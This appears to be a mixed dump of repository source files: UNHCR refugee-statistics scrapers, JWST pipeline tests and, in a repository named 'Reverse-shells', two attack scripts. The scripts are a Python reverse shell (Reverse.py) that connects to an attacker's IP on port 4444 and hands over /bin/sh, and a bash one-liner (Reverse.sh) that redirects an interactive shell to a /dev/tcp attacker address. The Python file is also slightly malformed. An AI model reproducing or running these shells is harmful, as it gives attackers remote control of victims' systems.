self.s\n s.send(ret)\n recv = s.recv(1024)\n if recv.decode() == 'dirNotExist':\n print(\"目标文件/文件夹不存在\")\n return \"No such file or directory\"\n elif recv.decode() == 'ok':\n fo = open(clientfilePath, 'rb')\n while True:\n filedata = fo.read(1024)\n if not filedata:\n break\n s.send(filedata)\n fo.close()\n recv = s.recv(1024)\n if recv.decode() == 'ok':\n print(\"文件传输成功\")\n s.close()\n return 0\n else:\n s.close()\n return \"md5sum error:md5sum is not correct!\"\n except Exception as e:\n print(e)\n\n def RecvFile(self,clientfilePath,serverfilePath):\n if not os.path.isdir(serverfilePath):\n filePath,fileName = os.path.split(serverfilePath)\n else:\n filePath = serverfilePath\n if not os.path.exists(clientfilePath):\n print('本地目标文件/文件夹不存在')\n return \"No such file or directory\"\n self.action = 'download'\n self.serverfilePath = serverfilePath\n self.clientfilePath = clientfilePath\n ret = self.struct_pack()\n \n try:\n s = self.s\n s.send(ret)\n recv = s.recv(struct.calcsize(self.dataFormat))\n self.struct_unpack(recv)\n if self.action.startswith(\"ok\"):\n if os.path.isdir(clientfilePath):\n fileName = (os.path.split(serverfilePath))[1]\n clientfile = os.path.join(clientfilePath, fileName)\n self.recvd_size = 0\n file = open(clientfile, 'wb')\n while not self.recvd_size == self.size:\n if self.size - self.recvd_size > 1024:\n rdata = s.recv(1024)\n self.recvd_size += len(rdata)\n else:\n rdata = s.recv(self.size - self.recvd_size)\n self.recvd_size = self.size\n file.write(rdata)\n file.close()\n print('\\n等待校验...')\n output = self.GetMD5(clientfile)\n if output == self.md5sum:\n print(\"文件传输成功\")\n else:\n print(\"文件校验不通过\")\n (status, output) = subprocess.getstatusoutput(\"del \" + clientfilePath)\n elif self.action.startswith(\"nofile\"):\n print('远程源文件/文件夹不存在')\n return \"No such file or directory\"\n except Exception as e:\n print(e)\n\n\n\n\n \n \n\nif __name__ == '__main__':\n fileclient = FileClient()\n fileclient.CheckUsers(\"1\",\"123456\")\n #fileclient.SendFile('./client_data/test.txt','./server_data')\n fileclient.RecvFile('./client_data/','./server_data/test2.txt')\n" }, { "alpha_fraction": 0.5567164421081543, "alphanum_fraction": 0.625373125076294, "avg_line_length": 30.13953399658203, "blob_id": "8c0a0477c46ba09e7751ca0dfe72dce20946b762", "content_id": 
"85e581e72d96790e7b683086843fc33f5a845683", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "permissive", "max_line_length": 265, "num_lines": 43, "path": "/AIE/keras/model_prediction.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import tldextract\nimport numpy as np\nimport time\nimport sklearn\nfrom keras.models import load_model\nfrom sklearn.cross_validation import train_test_split\n\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\n\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\n\ndef makeData(black=\"./data/dga.txt\"):\n X = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n X=np.mat(X)\n return X\n\n# 获取模型\nmodel = load_model(\"cnn-2121.h5\")\n# 输入测试集数据\ndata = makeData()\n# 开始预测\n# steps : 生成器返回数据的轮数,输出是恶意域名的概率\ntrain_data, test_data = train_test_split(data,test_size=0.1)\nstarts=time.time()\nmodel.predict(test_data,steps=1)\ntimecost=time.time()-starts\nprint(test_data.shape)\nprint(test_data.shape[0],\"items\")\nprint(timecost,\"seconds\")\nprint(test_data.shape[0]/timecost,\"-eps\")\n\n" }, { "alpha_fraction": 0.4869041442871094, "alphanum_fraction": 0.5309062600135803, "avg_line_length": 23.619354248046875, "blob_id": "764d6efc8de8fe1ec001104baf28aeaebe6aed89", "content_id": "9e58873e88dcbed869a08217f37d8642a9ea8c2d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4120, "license_type": "permissive", "max_line_length": 94, "num_lines": 155, "path": "/个人主页2_files/tool.js", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "function work_space(obj) //验证是否有空格\n{\n var pattern = /\\s/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_isNumber(obj) //验证浮点类型\n{\n var pattern = /(^[0-9]$)|(^[1-9]([0-9]*)$)|(^[0-9].([0-9]+)$)|(^[1-9]([0-9]*).([0-9]+)$)/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_isInteger(obj) //验证整数类型\n{ \n var pattern = /(^[0-9]$)|(^[1-9]([0-9]*)$)/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_isDate(obj) //验整日期类型(目前只能判断格式,内容需要再扩展)\n{\n var pattern = /^([12]\\d\\d\\d)-((0[1-9])|(1[12]))-((0[1-9])|(1[0-9])|(2[0-9])|(3[01]))$/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_select(slt, opt) //下拉列表选项定位\n{\n for (var i = 0; i < slt.length; i++){\n \n if (slt.options[i].value == opt)\n slt.options[i].selected = true;\n }\n}\nfunction work_select2(slt, opt) //单选项定位\n{\n\t\n for (var i = 0; i < slt.length; i++){\n \tif (slt[i].value == opt){\n slt[i].checked = true;\n }\n \n }\n}\n\nfunction work_calendar() //获取当前日历\n{\n calendar = new Date();\n day = calendar.getDay();\n month = calendar.getMonth();\n date = calendar.getDate();\n year = calendar.getYear();\n \n if (year < 100) \n year = 1900 + year;\n \n cent = parseInt(year/100);\n g = year % 19;\n k = parseInt((cent - 
17)/25);\n i = (cent - parseInt(cent/4) - parseInt((cent - k)/3) + 19*g + 15) % 30;\n i = i - parseInt(i/28)*(1 - parseInt(i/28)*parseInt(29/(i+1))*parseInt((21-g)/11));\n j = (year + parseInt(year/4) + i + 2 - cent + parseInt(cent/4)) % 7;\n l = i - j;\n emonth = 3 + parseInt((l + 40)/44);\n edate = l + 28 - 31*parseInt((emonth/4));\n emonth--;\n \n var dayname = new Array (\" 星期日\", \" 星期一\", \" 星期二\", \" 星期三\", \" 星期四\", \" 星期五\", \" 星期六\");\n var monthname = new Array (\"1月\",\"2月\",\"3月\",\"4月\",\"5月\",\"6月\",\"7月\",\"8月\",\"9月\",\"10月\",\"11月\",\"12月\" );\n document.write(\"<font color=#FFFFFF>\"+year +\"年\");\n document.write(monthname[month]);\n document.write(date + \"日\");\n document.write(dayname[day]+\" \");\n \n if ((month == 0) && (date == 1)) document.write(\"元旦\");\n if ((month == 4) && (date == 1)) document.write(\"国际劳动节\");\n if ((month == 4) && (date == 4)) document.write(\"青年节\");\n if ((month == 5) && (date == 1)) document.write(\"国际儿童节\");\n if ((month == 11) && (date == 25)) document.write(\"圣诞节\"); \n if ((month == 1) && (date == 14)) document.write(\"情人节\");\n if ((month == 2) && (date == 8)) document.write(\"妇女节\");\n if ((month == 2) && (date == 9)) document.write(\"教师节\");\n if ((month == 3) && (date == 1)) document.write(\"愚人节\");\n if ((month == 6) && (date == 1)) document.write(\"党的生日\");\n if ((month == 7) && (date == 1)) document.write(\"建军节\");\n if ((month == 9) && (date == 1)) document.write(\"国庆节\");\n \n document.write(\"</font>\");\n}\n\nfunction work_StringToUnicode(obj)\n{\n var s = '';\n for (var i = 0; i < obj.length; i++)\n s = s + obj.charCodeAt(i) + ';';\n \n return s;\n}\n\nfunction work_UnicodeToString(obj)\n{\n var code = obj.split(\";\");\n\n var s = '';\n for (var i = 0; i < code.length; i++)\n s = s + String.fromCharCode(code[i]);\n \n return s;\n}\n\nfunction work_trim(obj) //去除字符串两边空格\n{\n return obj.replace(/(^\\s*)|(\\s*$)/g, \"\");\n}\n\nfunction work_datetime() //当前日期时间\n{\n var now = new Date();\n var year = now.getYear();\n var month = now.getMonth() + 1;\n var date = now.getDate();\n var hour = now.getHours();\n var minute = now.getMinutes();\n \n var second = now.getTime() % 60000;\n second = (second - (second % 1000)) / 1000;\n \n if (month < 10)\n month = \"0\" + month;\n \n if (date < 10)\n date = \"0\" + date;\n \n if (hour < 10)\n hour = \"0\" + hour;\n \n if (minute < 10)\n minute = \"0\" + minute;\n\n if (second < 10)\n second = \"0\" + second;\n\n var clock = year + \"-\" + month + \"-\" + date + \" \" + hour + \":\" + minute + \":\" + second;\n return(clock);\n} \n" }, { "alpha_fraction": 0.559899091720581, "alphanum_fraction": 0.5709331631660461, "avg_line_length": 29.209524154663086, "blob_id": "4b37bda282a05dd4c21723d7814b3bc46e118004", "content_id": "3e0969ac33ad33581ac33f18787248849e95c838", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3172, "license_type": "permissive", "max_line_length": 137, "num_lines": 105, "path": "/search/apps/restful/algorithm_mgmt.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "from flask import *\nfrom service import data_show as ads\nimport json\nfrom apps.restful import api\n\[email protected]('/aievisualize/rest/threatevent/threat_event_list_data')\ndef get_all_output_data():\n try: \n current_page = int(request.args.get('current_page')) if request.args.get('current_page') else 1\n page_size = int(request.args.get('pageSize')) if request.args.get('pageSize') else 20\n except:\n 
items = []\n total = 0\n resultCode = '5'\n else:\n items, total, resultCode = ads.get_all_result(current_page,page_size)\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n try:\n json_data = json.dumps(rstJson)\n except:\n items = []\n total = 0\n resultCode = '5'\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n json_data = json.dumps(rstJson)\n return json_data\n\[email protected]('/aievisualize/rest/threatevent/threat_event_detect_list_data')\ndef get_detect_output_data():\n try:\n threat_type = str(request.args.get('ThreatType')).encode('utf-8') if request. args.get('ThreatType') else '40000'.encode(\"utf-8\")\n current_page = int(request.args.get('current_page')) if request.args.get('current_page') else 1\n page_size = int(request.args.get('pageSize')) if request.args.get('pageSize') else 20\n beginTime = int(request.args.get('beginTime')) if request.args.get('beginTime') else 0\n endTime = int(request.args.get('endTime')) if request.args.get('endTime') else 1538212486\n except:\n items = []\n total = 0\n resultCode = '5'\n else:\n items, total, resultCode = ads.get_detect_result(threat_type,current_page,page_size,beginTime,endTime)\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n try:\n json_data = json.dumps(rstJson)\n except:\n items = []\n total = 0\n resultCode = '5'\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n json_data = json.dumps(rstJson)\n return json_data\n\[email protected](\"/aievisualize/rest/threatevent/threat_event_agg_data\")\ndef get_algorithms_num():\n errDesc = \"OK\"\n resultCode = \"0\"\n aggField = str(request.args.get(\"aggField\"))\n try:\n if aggField == \"ThreatType\":\n agg_terms = ads.get_algorithms_type_num()\n elif aggField == \"ThreatLevel\":\n agg_terms = ads.get_algorithms_level_num()\n else:\n resultCode = \"1\"\n errDesc = \"Fail\"\n agg_terms = []\n except Exception:\n resultCode = \"4\"\n errDesc = \"Fail\"\n agg_terms = []\n data = [\n {\n \"key\" : \"\",\n \"doc_count\" : len(agg_terms),\n \"agg_terms\" : agg_terms,\n }\n ]\n rstJson = {\n \"resultCode\" : resultCode,\n \"errDesc\" : errDesc,\n \"totalCount\" : len(data),\n \"data\" : data\n }\n json_data = json.dumps(rstJson)\n return json_data\n" }, { "alpha_fraction": 0.7570093274116516, "alphanum_fraction": 0.7570093274116516, "avg_line_length": 20.399999618530273, "blob_id": "ace975421dd8a614a41d5e8df29ec393edf0a8bf", "content_id": "46c7cb7a9860b9d099cca2401ea6fc0160a3c54e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 107, "license_type": "permissive", "max_line_length": 39, "num_lines": 5, "path": "/search/apps/restful/__init__.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "from flask import Blueprint\n\napi = Blueprint('restful', __name__)\n\nfrom apps.restful import algorithm_mgmt\n" } ]
17
pablitoarango/ColombiaRefugeeVisualization
https://github.com/pablitoarango/ColombiaRefugeeVisualization
91318d4a7c3662d554815daf5db480228b90bc6c
fac0ac50ca56add5fdcbeacff222e2fcaa241c3d
1d58b4dedc1df19ea55195a4a4b87236dfd14804
refs/heads/master
2022-05-03T06:52:26.731828
2014-11-16T06:22:26
2014-11-16T06:22:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48275861144065857, "alphanum_fraction": 0.48275861144065857, "avg_line_length": 28, "blob_id": "2e89673aef575a3f813471ec13f012a64afc6f40", "content_id": "370a3bdb0902888f0b89466fc8cf5c284eb21e47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 58, "license_type": "no_license", "max_line_length": 28, "num_lines": 2, "path": "/README.md", "repo_name": "pablitoarango/ColombiaRefugeeVisualization", "src_encoding": "UTF-8", "text": "ColombiaRefugeeVisualization\n============================\n" }, { "alpha_fraction": 0.650943398475647, "alphanum_fraction": 0.6643081903457642, "avg_line_length": 31.487178802490234, "blob_id": "8534424cb3bf412a6823fd9f52f31038674bb34d", "content_id": "42f2e20a178327b41af7f8a3a5a928d2184e45a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "no_license", "max_line_length": 121, "num_lines": 39, "path": "/alldata.py", "repo_name": "pablitoarango/ColombiaRefugeeVisualization", "src_encoding": "UTF-8", "text": "\nimport urllib2\nimport json\n\n\nEverything = {}\nresponse = urllib2.urlopen('http://data.unhcr.org/api/stats/country_of_residence.json')\ndata = json.load(response)\nfor country in data:\n\tcode = country['country_of_residence']\n\tresponse = urllib2.urlopen('http://data.unhcr.org/api/stats/persons_of_concern.json?year=2013&country_of_origin='+ code)\n\tdata = json.load(response)\n\tinfo = {}\n\tinfo[\"year\"] = 2013\n\tinfo[\"total_population\"] =0\n\tinfo[\"refugees\"] =0\n\tinfo[\"returned_refugees\"] = 0\n\tinfo[\"idps\"] = 0\n\tinfo[\"asylum_seekers\"] = 0\n\n\tfor i in range (len(data)):\n\t\tif data[i][\"total_population\"] is not None and data[i][\"total_population\"]!='*':\n\t\t\tinfo[\"total_population\"] += int(data[i][\"total_population\"])\n\t\tif data[i][\"refugees\"] is not None:\n\t\t\tinfo[\"refugees\"] += int(data[i][\"refugees\"])\n\t\tif data[i][\"returned_refugees\"] is not None:\n\t\t\tinfo[\"returned_refugees\"] += int(data[i][\"returned_refugees\"])\n\t\tif data[i][\"idps\"] is not None:\n\t\t\tinfo[\"idps\"] += int(data[i][\"idps\"])\n\t\tif data[i][\"asylum_seekers\"] is not None:\n\t\t\tinfo[\"asylum_seekers\"] += int(data[i][\"asylum_seekers\"])\n\tEverything[code]= info\n\tprint code\n\njsondata=json.dumps(Everything.values(), indent=4, separators=(',', ': '))\n\n\nf = open('countries_data.json', 'w')\nprint >> f, jsondata\nf.close()\n\n\n\n\n" }, { "alpha_fraction": 0.6329004168510437, "alphanum_fraction": 0.6476190686225891, "avg_line_length": 27.073171615600586, "blob_id": "8baccce559554c03bede3142cf6fab7fa74327d9", "content_id": "06389351d3211426fe83f63687c343149ecc4f4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1155, "license_type": "no_license", "max_line_length": 127, "num_lines": 41, "path": "/data.py", "repo_name": "pablitoarango/ColombiaRefugeeVisualization", "src_encoding": "UTF-8", "text": "import urllib2\nimport json\n\n\n\nyears = {}\n\nyear=2000\nwhile year != 2014:\n\tresponse = urllib2.urlopen('http://data.unhcr.org/api/stats/persons_of_concern.json?year='+str(year)+'&country_of_origin=COL')\n\tdata = json.load(response)\n\tinfo = {}\n\tinfo[\"year\"] = year\n\tinfo[\"total_population\"] =0\n\tinfo[\"refugees\"] =0\n\tinfo[\"returned_refugees\"] = 0\n\tinfo[\"idps\"] = 0\n\tinfo[\"asylum_seekers\"] = 0\n\t\n\tfor i in range (len(data)):\n\t\tif data[i][\"total_population\"] is not None 
and data[i][\"total_population\"]!='*':\n\t\t\tinfo[\"total_population\"] += int(data[i][\"total_population\"])\n\t\tif data[i][\"refugees\"] is not None:\n\t\t\tinfo[\"refugees\"] += int(data[i][\"refugees\"])\n\t\tif data[i][\"returned_refugees\"] is not None:\n\t\t\tinfo[\"returned_refugees\"] += int(data[i][\"returned_refugees\"])\n\t\tif data[i][\"idps\"] is not None:\n\t\t\tinfo[\"idps\"] += int(data[i][\"idps\"])\n\t\tif data[i][\"asylum_seekers\"] is not None:\n\t\t\tinfo[\"asylum_seekers\"] += int(data[i][\"asylum_seekers\"])\n\tyears[year]= info\n\tprint info\n\tprint year\n\tyear+=1\nprint years\njsondata=json.dumps(years.values(), indent=4, separators=(',', ': '))\nprint jsondata\n\nf = open('data.json', 'w')\nprint >> f, jsondata\nf.close()\n\n\n\n\n" } ]
3
talamiri/Reverse-shells
https://github.com/talamiri/Reverse-shells
2fb0e4598c7855dadf000b3915a9c34c06586941
2ae1e4734247ee9f351be6111bccc3d8f9e05c66
192333e72797a7318298241c3b5491470a1ac5ea
refs/heads/main
2023-05-24T14:33:34.092977
2021-06-25T18:30:16
2021-06-25T18:30:16
380,322,365
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.631205677986145, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20.69230842590332, "blob_id": "8d9fe873c847ccdfd0a09e3fd9649fcc23e73eea", "content_id": "47a2635c92fa059e1c312b52e9c739e6394fff89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 282, "license_type": "no_license", "max_line_length": 53, "num_lines": 13, "path": "/Reverse.py", "repo_name": "talamiri/Reverse-shells", "src_encoding": "UTF-8", "text": "import socket\nimport subprocess\nimport os\n\nlhost = \"Enter Attackers IP\"\nlport = 4444\n\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) \n s.connect((\"lhost,lport))\n os.dup2(s.fileno(),0) \n os.dup2(s.fileno(),1) \n os.dup2(s.fileno(),2)\n p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" }, { "alpha_fraction": 0.5849056839942932, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 52, "blob_id": "a9d0581942065bd8229c1f7c53bd560acaac7b42", "content_id": "5b687b21dd51143fc60dbb2c8c457f0407f6fcd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 53, "license_type": "no_license", "max_line_length": 52, "num_lines": 1, "path": "/Reverse.sh", "repo_name": "talamiri/Reverse-shells", "src_encoding": "UTF-8", "text": "bash -c 'bash -i >& /dev/tcp/attackers-ip/port 0>&1'\n" } ]
2
mperrin/jwst
https://github.com/mperrin/jwst
59bff92d15e099e2e67d57df848a83af04743c61
e3a5b2d8bb50d92ccca46cd3bbd6585d5238000a
4c38570d4e53aae508ce90595d885ab0f26aaf7a
refs/heads/master
2022-12-02T17:17:49.075691
2020-08-17T15:16:40
2020-08-17T15:16:40
288,289,926
0
0
NOASSERTION
2020-08-17T21:27:35
2020-08-17T15:16:44
2020-08-17T20:39:39
null
[ { "alpha_fraction": 0.5203045606613159, "alphanum_fraction": 0.6086755990982056, "avg_line_length": 33.95161437988281, "blob_id": "19d23181e11e32f9db5c7d65eb5a8c8205fc4d86", "content_id": "2ec7d2aa35387227f3626f70948cb239ae0795dd", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4334, "license_type": "permissive", "max_line_length": 87, "num_lines": 124, "path": "/jwst/tests_nightly/general/miri/test_sloperpipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from glob import glob\nimport os\n\nimport pytest\n\nfrom jwst.pipeline import Detector1Pipeline\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestMIRISloperPipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_sloperpipeline','truth']\n test_dir = 'test_sloperpipeline'\n\n def test_gain_scale_naming(self):\n \"\"\"\n Regression test for gain_scale naming when results are requested to\n be saved for the gain_scale step.\n \"\"\"\n expfile = 'jw00001001001_01101_00001_MIRIMAGE'\n input_file = self.get_data(self.test_dir, expfile+'_uncal.fits')\n input_name = os.path.basename(input_file)\n\n step = Detector1Pipeline()\n step.group_scale.skip = True\n step.dq_init.skip = True\n step.saturation.skip = True\n step.ipc.skip = True\n step.superbias.skip = True\n step.refpix.skip = True\n step.rscd.skip = True\n step.firstframe.skip = True\n step.lastframe.skip = True\n step.linearity.skip = True\n step.dark_current.skip = True\n step.persistence.skip = True\n step.jump.skip = True\n step.ramp_fit.skip = False\n\n step.gain_scale.skip = False\n step.gain_scale.save_results = True\n\n step.run(input_file)\n\n\n files = glob('*.fits')\n\n if input_name in files:\n files.remove(input_name)\n\n output_file = expfile + '_gain_scale.fits'\n assert output_file in files\n files.remove(output_file)\n\n output_file = expfile + '_gain_scaleints.fits'\n assert output_file in files\n files.remove(output_file)\n\n assert not len(files)\n\n def test_detector1pipeline1(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00001001001_01101_00001_MIRIMAGE_uncal.fits')\n\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = True\n step.refpix.side_smoothing_length=11\n step.refpix.side_gain=1.0\n step.refpix.odd_even_rows = True\n step.persistence.skip = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = False\n step.output_file='jw00001001001_01101_00001_MIRIMAGE'\n step.suffix='rate'\n\n step.run(input_file)\n\n outputs = [('jw00001001001_01101_00001_MIRIMAGE_ramp.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_uncal_jump.fits'),\n ('jw00001001001_01101_00001_MIRIMAGE_rateints.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_uncal_integ.fits'),\n ('jw00001001001_01101_00001_MIRIMAGE_rate.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_uncal_MiriSloperPipeline.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_detector1pipeline2(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw80600012001_02101_00003_mirimage_uncal.fits')\n\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = True\n 
step.refpix.side_smoothing_length=11\n step.refpix.side_gain=1.0\n step.refpix.odd_even_rows = True\n step.persistence.skip = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = False\n step.output_file='jw80600012001_02101_00003_mirimage'\n step.suffix='rate'\n\n step.run(input_file)\n\n outputs = [('jw80600012001_02101_00003_mirimage_ramp.fits',\n 'jw80600012001_02101_00003_mirimage_ramp.fits'),\n ('jw80600012001_02101_00003_mirimage_rateints.fits',\n 'jw80600012001_02101_00003_mirimage_rateints.fits'),\n ('jw80600012001_02101_00003_mirimage_rate.fits',\n 'jw80600012001_02101_00003_mirimage_rate.fits')\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.583419680595398, "alphanum_fraction": 0.5927461385726929, "avg_line_length": 30.129032135009766, "blob_id": "0e453e9767055ef8f80cffb3dce954553b92dbba", "content_id": "04f7a054d2293def128ddeb7c0e7943ab4530818", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 965, "license_type": "permissive", "max_line_length": 90, "num_lines": 31, "path": "/jwst/lib/exposure_types.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nThis module contains lists of modes grouped in different ways\n\"\"\"\nfrom ..associations.lib.dms_base import (ACQ_EXP_TYPES, IMAGE2_SCIENCE_EXP_TYPES,\n IMAGE2_NONSCIENCE_EXP_TYPES,\n SPEC2_SCIENCE_EXP_TYPES)\n\nIMAGING_TYPES = set(tuple(ACQ_EXP_TYPES) + tuple(IMAGE2_SCIENCE_EXP_TYPES)\n + tuple(IMAGE2_NONSCIENCE_EXP_TYPES) +\n ('fgs_image', 'fgs_focus'))\n\nSPEC_TYPES = SPEC2_SCIENCE_EXP_TYPES\n\n# FGS guide star exposures\nFGS_GUIDE_EXP_TYPES = [\n 'fgs_acq1',\n 'fgs_acq2',\n 'fgs_fineguide',\n 'fgs_id-image',\n 'fgs_id-stack',\n 'fgs_track',\n]\n\n\ndef is_moving_target(input_models):\n \"\"\" Determine if a moving target exposure.\"\"\"\n model = input_models[0]\n if hasattr(model.meta.target, 'type') and \\\n model.meta.target.type is not None and model.meta.target.type.lower() == 'moving':\n return True\n return False\n" }, { "alpha_fraction": 0.6428065299987793, "alphanum_fraction": 0.6619418859481812, "avg_line_length": 24.196428298950195, "blob_id": "be0754a054ab31076fcbe9c845b6371f002e620b", "content_id": "568c2c3ff6548db3a809b1bdd44c2e5f6c62be8a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1411, "license_type": "permissive", "max_line_length": 77, "num_lines": 56, "path": "/jwst/outlier_detection/tests/test_outlier_detection.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\n\nfrom jwst.outlier_detection.outlier_detection import flag_cr\nfrom jwst import datamodels\n\n\[email protected]\ndef sci_blot_image_pair():\n \"\"\"Provide a science and blotted ImageModel pair.\"\"\"\n shape = (10, 10)\n sci = datamodels.ImageModel(shape)\n\n # Populate keywords\n sci.meta.exposure.exposure_time = 1\n\n # Add poisson noise to image data\n p = np.random.poisson(size=shape, lam=1e3)\n sci.data = p / p.mean() - 1\n\n # The blot image is just a smoothed version of the science image\n blot = sci.copy()\n blot.data = gaussian_filter(blot.data, sigma=3)\n\n return sci, blot\n\n\ndef test_flag_cr(sci_blot_image_pair):\n \"\"\"Test the flag_cr function. 
Test logic, not the actual noise model.\"\"\"\n sci, blot = sci_blot_image_pair\n assert (sci.dq == 0).all()\n\n # Add some background\n sci.data += 3\n blot.data += 3\n\n # Drop a CR on the science array\n sci.data[5, 5] += 10\n\n flag_cr(sci, blot)\n assert sci.dq[5, 5] > 0\n\n\ndef test_flag_cr_with_subtracted_background(sci_blot_image_pair):\n \"\"\"Test the flag_cr function on background-subtracted data\"\"\"\n sci, blot = sci_blot_image_pair\n\n sci.meta.background.subtracted = True\n sci.meta.background.level = 3\n\n # Drop a CR on the science array\n sci.data[5, 5] += 10\n\n flag_cr(sci, blot)\n assert sci.dq[5, 5] > 0\n" }, { "alpha_fraction": 0.5407925248146057, "alphanum_fraction": 0.5530303120613098, "avg_line_length": 22.189189910888672, "blob_id": "ba0ec338213b740253a22a93c3868fba10810a88", "content_id": "b2f1af875d1c14c0954165769112ef20fed1e124", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1716, "license_type": "permissive", "max_line_length": 76, "num_lines": 74, "path": "/jwst/tests_nightly/general/associations/test_level3_product_names.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nimport re\n\nfrom jwst.associations.tests.helpers import (\n func_fixture,\n generate_params,\n registry_level3_only,\n t_path,\n)\n\nfrom jwst.associations import (AssociationPool, generate)\nfrom jwst.associations.lib.dms_base import DMSAttrConstraint\n\n\nLEVEL3_PRODUCT_NAME_REGEX = (\n r'jw'\n r'(?P<program>\\d{5})'\n r'-(?P<acid>[a-z]\\d{3,4})'\n r'_(?P<target>(?:t\\d{3})|(?:\\{source_id\\}))'\n r'(?:-(?P<epoch>epoch\\d+))?'\n r'_(?P<instrument>.+?)'\n r'_(?P<opt_elem>.+)'\n)\n\nLEVEL3_PRODUCT_NAME_NO_OPTELEM_REGEX = (\n r'jw'\n r'(?P<program>\\d{5})'\n r'-(?P<acid>[a-z]\\d{3,4})'\n r'_(?P<target>(?:t\\d{3})|(?:s\\d{5}))'\n r'(?:-(?P<epoch>epoch\\d+))?'\n r'_(?P<instrument>.+?)'\n)\n\n# Null values\nEMPTY = (None, '', 'NULL', 'Null', 'null', 'F', 'f', 'N', 'n')\n\n\npool_file = func_fixture(\n generate_params,\n scope='module',\n params=[\n t_path('data/mega_pool.csv'),\n ]\n)\n\n\nglobal_constraints = func_fixture(\n generate_params,\n scope='module',\n params=[\n DMSAttrConstraint(\n name='asn_candidate',\n value=['.+o002.+'],\n sources=['asn_candidate'],\n force_unique=True,\n is_acid=True,\n evaluate=True,\n ),\n ]\n)\n\n\[email protected]\ndef test_level35_names(pool_file):\n rules = registry_level3_only()\n pool = AssociationPool.read(pool_file)\n asns = generate(pool, rules)\n for asn in asns:\n product_name = asn['products'][0]['name']\n if asn['asn_rule'] == 'Asn_IFU':\n m = re.match(LEVEL3_PRODUCT_NAME_NO_OPTELEM_REGEX, product_name)\n else:\n m = 